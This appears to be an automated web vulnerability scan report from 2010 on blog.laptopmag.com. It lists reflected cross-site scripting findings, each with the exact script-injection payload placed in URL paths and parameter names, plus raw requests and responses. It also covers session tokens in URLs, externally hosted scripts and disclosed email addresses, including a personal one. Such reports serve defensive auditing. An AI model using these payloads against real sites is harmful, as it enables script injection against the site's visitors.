Certain
Host:
http://blog.laptopmag.com
Path:
/sony-whittles-their-vaio-y-series-to-11-6-inches
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9e5d</script><script>alert(1)</script>57df943a5d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sony-whittles-their-vaio-y-series-to-11-6-inches?c9e5d</script><script>alert(1)</script>57df943a5d7=1 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:12:51 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fUN>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 66670
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 713ad</script><script>alert(1)</script>ea343bef514 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /top-laptops-of-october-2010713ad</script><script>alert(1)</script>ea343bef514 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:12:48 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:12:48 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51543
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.23. http://blog.laptopmag.com/top-laptops-of-october-2010 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.laptopmag.com
Path:
/top-laptops-of-october-2010
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 507e7</script><script>alert(1)</script>91e979c56f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /top-laptops-of-october-2010?507e7</script><script>alert(1)</script>91e979c56f0=1 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:12:32 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fDB>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65501
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54882</script><script>alert(1)</script>707be7630db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video-macbook-air-11-inch-boots-and-wakes-faster-than-fastest-win-7-notebook54882</script><script>alert(1)</script>707be7630db HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:12:36 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:12:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51641
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.25. http://blog.laptopmag.com/video-macbook-air-11-inch-boots-and-wakes-faster-than-fastest-win-7-notebook [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65870</script><script>alert(1)</script>a5fd754f4b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video-macbook-air-11-inch-boots-and-wakes-faster-than-fastest-win-7-notebook?65870</script><script>alert(1)</script>a5fd754f4b9=1 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:12:21 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fug>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 72672
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET / HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:31 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/NAxW>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94614
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /10-reasons-why-consumers-should-buy-business-notebooks HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:57 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-6pE>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 79295
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /5-questions-to-answer-before-you-buy-a-laptop HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:57 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-8b3>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 70712
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /bestdeals.aspx HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:11:32 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:11:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51291
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /deal-of-the-day-get-a-hp-pavilion-dm4-fo-629 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:56 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fUt>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65334
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /deal-of-the-day-lenovo-g460-for-579 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:45 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fWV>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65516
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /help-me-laptop-international-business-traveller-seeking-a-productivity-notebook HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:33 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fP3>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 71451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /how-to-buy-headphones-as-a-gift HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:44 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fUv>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 66505
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /is-this-the-nexus-s HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:38 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fXn>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /macbook-air-hands-on HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:32 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fnc>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77502
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /sony-whittles-their-vaio-y-series-to-11-6-inches HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:53 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fUN>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 66617
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /top-laptops-of-october-2010 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:33 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fDB>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /video-macbook-air-11-inch-boots-and-wakes-faster-than-fastest-win-7-notebook HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:34 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fug>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 72619
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET / HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:31 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/NAxW>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94614
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /10-reasons-why-consumers-should-buy-business-notebooks HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:57 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-6pE>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 79295
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /5-questions-to-answer-before-you-buy-a-laptop HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:57 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-8b3>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 70712
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /bestdeals.aspx HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:11:32 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:11:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51291
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /deal-of-the-day-get-a-hp-pavilion-dm4-fo-629 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:56 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fUt>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65334
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /deal-of-the-day-lenovo-g460-for-579 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:45 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fWV>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65516
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /help-me-laptop-international-business-traveller-seeking-a-productivity-notebook HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:33 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fP3>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 71451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /how-to-buy-headphones-as-a-gift HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:44 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fUv>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 66505
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /is-this-the-nexus-s HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:38 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fXn>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /macbook-air-hands-on HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:32 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fnc>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77502
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /sony-whittles-their-vaio-y-series-to-11-6-inches HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:53 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fUN>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 66617
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /top-laptops-of-october-2010 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:33 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fDB>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /video-macbook-air-11-inch-boots-and-wakes-faster-than-fastest-win-7-notebook HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:34 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fug>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 72619
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
tips@bedfordmags.com
Request
GET / HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:31 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/NAxW>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94614
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following email address was disclosed in the response:
tips@bedfordmags.com
Request
GET /10-reasons-why-consumers-should-buy-business-notebooks HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:11:57 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-6pE>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 79295
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following email addresses were disclosed in the response:
jamesawilliams2000@yahoo.com
tips@bedfordmags.com
Request
GET /5-questions-to-answer-before-you-buy-a-laptop HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
